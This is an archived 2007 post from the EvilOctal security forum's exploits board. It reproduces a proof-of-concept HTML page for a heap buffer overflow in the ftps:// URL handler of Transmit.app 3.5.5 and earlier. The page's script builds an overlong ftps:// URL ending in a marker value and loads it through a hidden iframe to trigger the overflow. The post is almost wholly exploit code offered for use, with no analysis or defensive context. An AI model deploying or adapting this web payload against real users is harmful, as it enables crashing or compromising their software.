邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Transmit.app <= 3.5.5 ftps:// URL Handler Heap Buffer Overflow PoC [查看完整版本]

pub!1c 2007-1-21 10:58

Transmit.app <= 3.5.5 ftps:// URL Handler Heap Buffer Overflow PoC

[code]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
  "[url]http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd[/url]">
<html>
  <head>
    <title>MOAB-19-01-2007</title>
    <script>
      function boom() {
         var recipient = document.getElementById(&#39;testbox&#39;);
        var str = &#39;&#39;;
        for (var i = 0; i < 408; i++) {
           str = str + &#39;A&#39;
        }
        str = str + &#39;ABCD&#39;;
        
        alert(&#39;Payload size: &#39; + str.length);
        
        str = "ftps://" + str;
        ftarget = document.createElement(&#39;iframe&#39;);
        ftarget.src = str;
        ftarget.width = 1;
        ftarget.height = 1;
        recipient.appendChild(ftarget);
      }
    </script>
  </head>
  <body>
     <div id="testbox" style="display: none;"></div>
    <input type="button" onclick="boom();" value="Test MOAB-19-01-2007" />

  </body>
</html>

[/code]

查看完整版本: Transmit.app &lt;= 3.5.5 ftps:// URL Handler Heap Buffer Overflow PoC

© 1999-2008 EvilOctal Security Team